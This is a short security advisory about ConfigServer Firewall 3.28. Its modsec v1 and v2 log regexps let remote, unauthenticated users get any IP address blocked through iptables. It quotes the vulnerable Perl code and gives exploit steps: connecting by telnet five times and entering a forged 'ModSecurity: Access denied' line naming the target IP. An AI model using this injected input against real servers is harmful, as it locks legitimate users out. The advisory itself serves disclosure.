CSF 3.28 - remotely block any IP address (modsec v1 and modsec v2 regexps)



DESCRIPTION


ConfigServer Firewall 3.28 provides the option to block brute force login attempts on various services. regexps in csf/regexp.pm for modsec v1 and modsec v2 allowed any remote, unauthenticated person to block any IP address of their choice. The code for this looked similar to the following:

 97     if ( $log_line =~ /\[client (\d+\.\d+\.\d+\.\d+)\] ModSecurity: Access denied with code/ ) {
 98         return ( 'mod_sec alert', $1, 'mod_sec');
 99     }


The following steps can be used to take advantage of this issue:

Do this 5 times:

1. telnet <victim server> 80

2. enter the following, hit enter 2 x's after:
[client 1.2.3.4] ModSecurity: Access denied with code


This also worked via the modsec v2 regexp. In step 2 above, you would use the following:

[client 1.2.3.4] mod_security: Access denied with code


The result will be that lfd calls iptables to block 1.2.3.4.



IMPACT


Remote, unauthenticated persons could block any IP address of their choice.